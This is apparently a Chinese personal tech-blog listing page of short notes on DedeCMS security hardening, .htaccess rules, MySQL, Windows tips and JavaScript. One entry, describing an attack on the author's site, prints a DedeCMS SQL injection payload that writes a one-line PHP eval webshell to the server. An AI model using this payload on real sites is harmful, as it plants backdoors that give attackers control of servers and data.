欢迎各位兄弟 发布技术文章

这里的技术是共享的

shiping1 的头像

PHP安全讲DedeCms的安全加固

DedeCms做为国内使用最为广泛使用人数最多的CMS之一,经常爆出漏洞,每个漏洞的爆出,影响都是一大片,轻则被人挂广告、弹框,重则服务器成为肉机,宝贵数据丢失。那么有什么办法可以提高DedeCms的安全性呢?

  先来看看原因吧,为什么PHP程序经常出漏洞,其实是由PHP程序本身决定的。PHP可复用性低,导致程序结构错综复杂,到处是冗余代码,这样 不仅利于漏洞的产生,还影响漏洞的修得;PHP程序入门简单且普遍开源,导致很多人都可直接阅读代码,搜寻漏洞;这样便有源源不断的漏洞被发现、被修复、 被发现……。而当前流行的PHP系统习惯用以文件形式做为缓存,这样就需要开放文件的写权限,这无疑成为PHP系统的软肋。目前针对PHP系统的攻击方 式,除了已经很少出现的“注入”攻击外,大部分攻击都是通过系统的某个漏洞,向可写文件里插入一句话木马,以此方式获得shell。

普通分类: 
shiping1 的头像

php程序安全原则

“可执行的文件不允许被修改,可写文件不允许被访问”这是网站权限控制的根本原则,网站程序在“可写文件不允许被访问”方面可做许多工作。

普通分类: 
shiping1 的头像

dedecms 防护的办法

把所有可能 被侵入的文件夹 及里面的文件 改成 755 吧

普通分类: 
shiping1 的头像

php.ini 如何禁用 eval

eval是一个语言构造器而不是一个函数 所以无法 在 disable_functions 中禁用

普通分类: 
shiping1 的头像

dedecms 攻击我的网站的方法

mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`

 

 

普通分类: 
shiping1 的头像

看apache的日志文件在哪里

访问日志 是  access.log

错误日志是 error.log

在httpd.conf 中会找到它的路径

普通分类: 
shiping1 的头像

屏幕显示器 有问题 如何调整

按住显示器 上面的几个按钮 

看如何重置  或者(恢复出厂设置)

普通分类: 
shiping1 的头像

利用.htaccess将多个域名绑定到同一空间

在工作中遇到将多个域名绑定到一个空间上,
折腾一番然后用Apache的.htaccess解决了这个问题。
其实原理就是判断访问的域名然后指向不同的目录。
很简单,就直接贴内容了


代码里内容简述
m.heqee.com 和 wap.NAME.com 指向目录 wap
aaa.com/www.aaa.com 指向目录 aaa
bbb.com/www.bbb.com 指向目录 bbb

 <IfModule mod_rewrite.c>
  RewriteEngine on
  #301
  rewritecond %{http_host} ^NAME.com.biz [nc]
  rewriterule ^(.*)$ http://www.NAME.com/$1 [r=301,nc]
 
  # m/wap.heqee.com 二级目录

普通分类: 
shiping1 的头像

几个ok的htaccess 有大用

一个ok的htaccess

AddDefaultCharset UTF-8


<IfModule mod_rewrite.c>

RewriteEngine On
RewriteCond %{HTTP_HOST} ^aaa.com$ [NC]
RewriteRule ^(.*)$ http://www.aaa.com/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|iemobile|iphone|ipod|opera mobile|palmos|webos" [NC]

RewriteRule ^(.*)$ http://3g.aaa.com/ [NC,R=301]

#给在线咨询做个伪静态

普通分类: 
shiping1 的头像

mysql 从一个表取数据插入另一个表

INSERT INTO bbb(aid,bid) select aid,5 from aaa

从aaa表中取所有数据 插到bbb表中

普通分类: 
shiping1 的头像

QQ群里面自动打用户名

QQ群里面自动打用户名

@用户名(它是自动补全的)   就可以了

普通分类: 
shiping1 的头像

drupal vbo 批量处理字段(编辑删除) 修改 有大用

来自 http://ninghao.net/video/198

这个视频看批量处理字段(编辑删除)

dbo模块  http://ninghao.net/video/198 dbo模块

应该是vbo模块吧 views bulk oprations
http://drupal.org/project/taxonomy_multi_edit 批量修改分类

下面是最关键的一步

 

里面还有一步

普通分类: 
shiping1 的头像

firefox 修改快捷键

可以的,可以用一个叫keyconfig的扩展。
Firefox的快捷键不提供直接修改,但是我们可以通过这个插件来做到:
Key Config

下载地址:http://forums.mozillazine.org/viewtopic.php?t=72994 
普通分类: 
shiping1 的头像

win7鼠标拖到顶部禁止窗口自动最大化 自动放大 有大用

 步骤方法

  单击“开始”按钮,选择“运行”,或者通过快捷键组合“win+R”打开“运行”对话框,在对话框中输入“regedit”,然后回车,此时打开“注册表编辑器”。

win7禁止窗口自动最大化 三联教程

  在“注册表编辑器”里面依次寻找到“HKEY_CURRENT_USER/Control panel/Desktop”该项,然后再右侧窗口里面,选中“WindowsArrangementActive”,右击该项的字符串值,选择“修改”。

win7禁止窗口自动最大化

普通分类: 
shiping1 的头像

宽带连接快捷方式怎么创建

(方法一) (这种方法绝对有用)

打开控制面板,点击网络和Internet连接

2 如果存在宽带连接选项。

普通分类: 
shiping1 的头像

安装某程序时无法通过windows installer 服务安装此安装程序包

安装某程序时无法通过windows installer 服务安装此安装程序包

1)我们到 控制面板的服务中 先启动 windows installer 服务(把它设为自动吧)

2)继续安装某程序,如果还是出现这个错误提示的话

普通分类: 
shiping1 的头像

百度 搜索出现禁止恶意点击

百度 搜索 出现禁止恶意点击

一般情况下是 竞价 设置的情况 或者竞价设置的问题

普通分类: 
shiping1 的头像

firefox 下载 exe,js,msi,php等文件时 出现 因安全设置阻止而取消

阻止下载

普通分类: 
shiping1 的头像

如何查看计算机是32位还是64位操作系统?

普通分类: 
shiping1 的头像

svn客户端TortoiseSVN安装配置和操作手册

svn客户端TortoiseSVN安装配置和操作手册

2006-12-15 2:28 +0800  

(好像是

普通分类: 
shiping1 的头像

文件 或文件夹比较工具

文件 或文件夹比较工具 UltraCompare  这个工具不错 可以和  svn 的比较功能相媲美

普通分类: 
shiping1 的头像

linux/win重置mysql的root密码

Windows环境的找回方法:

范甘迪说法国

1、打开cmd命令窗口,先输入命令:

      net stop mysql    回车     #关闭mysql服务。

      进入到D:\SOFT_PHP_PACKAGE\mysql\bin\ 目录下,执行mysqld --skip-grant-tables  启动MySQL Server   (如果报错,执行mysqld-nt --skip-grant-tables)如图:

普通分类: 
shiping1 的头像

添加百度分享代码后 如何百度搜索后 有大拇指

要进行百度分享的验证

进下面网站

http://share.baidu.com/analysis/general/

然后 http://share.baidu.com/analysis/verifydomain

 根据步骤一步步的来

(这个时候其实百度分享 代码 最要注意的是 代码里面的js 的uid参数)

普通分类: 
shiping1 的头像

jQuery 1.9 删除了以前jquery的部分功能 怎么办

普通分类: 
shiping1 的头像

js 刷新

//这两个好像是有区别的
window.location.href=location.href;
window.location.reload();


//指的是 在浏览器上的 url,,,当然在 浏览器上是伪静态,得出的 location.href 也是伪静态
alert(location.href);


<script>   
  alert("1:   "   +   window.location.href);   
  alert("2:   "   +   window.location);   
  alert("3:   "   +   location.href);   
  alert("4:   "   +   parent.location.href);   
  alert("5:   "   +   top.location.href);   
  alert("6:   "   +   document.location.href);   
</script>



 

普通分类: 
shiping1 的头像

php stristr

定义和用法

stristr() 函数查找字符串在另一个字符串中第一次出现的位置。

如果成功,则返回字符串的其余部分(从匹配点)。如果没有找到该字符串,则返回 false。

语法

stristr(string,search)
参数描述
string必需。规定被搜索的字符串。
find必需。规定要查找的字符。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。

提示和注释

注释:该函数是二进制安全的。

普通分类: 
shiping1 的头像

dede:ask DEDE首页调用问答

标签名称:ask
功能说明:问答调用标签
适用范围:全局使用
基本语法:
{dede:ask row='6' qtype='new' tid='0' titlelen='24'}
普通分类: 
shiping1 的头像

DedeCMS网站安全设置 防止网站被挂马

dedecms建站是让广大朋友又爱又恨。爱是因为织梦dedecms的易用性,恨是因为使用dedecms网站的容易被挂马。估计使用dedecms建站的朋友80%被挂马过吧,当然我也是。一般是直接加入黑链就是js中被加入恶意转向。

织梦DEDECMS网站安全设置

普通分类: 
shiping1 的头像

解决IE6浏览器下position:fixed固定定位问题

解决IE6浏览器下position:fixed固定定位问题
发布于:2011-10-05 18:07 | 点击:113 | 评论:0
使元素固定在浏览器的顶部:#top{
_position:absolute;
_bottom:auto;
_top:expression(eval(document.documentElement.scrollTop));
}使元素固定在浏览器的底部:#top{
_position:absolute;
_bottom:auto;
_top:expression(eval(document.documentElement.scrollTop+document.documentElement.clientHeight-this.offsetHeight-(parseInt(this.currentStyle.marginTop,10)||0)-(parseInt(this.currentStyle.marginBottom,10)||0)));
}这两段代码只能实现在最底部跟最顶部,你可以使用 _margin-top:10px; 或者 _margin-bottom:10px; 修改其中的数值控制元素的位置。

普通分类: 
shiping1 的头像

setInterval

setInterval(表达式,交互时间)
则不一样,它从载入后,每隔指定的时间就执行一次表达式

用setInterval实现的自动变化显示随机数的效果:

<html>
<head>
<script>
function sett()
{
document.body.innerHTML=Math.random();
}
setInterval("sett();", 500);
</script>
</script>
</head>
<body>
</body>
</html>


var MyMarss=setInterval(Marqueess,speedss);
tabss.onmouseover=function() {clearInterval(MyMarss)};//鼠标移上时清除定时器达到滚动停止的目的




setInterval(function(){  

普通分类: 

页面

Subscribe to 个人技术网_前端_后台_php_div_css_linux_javascript_seo RSS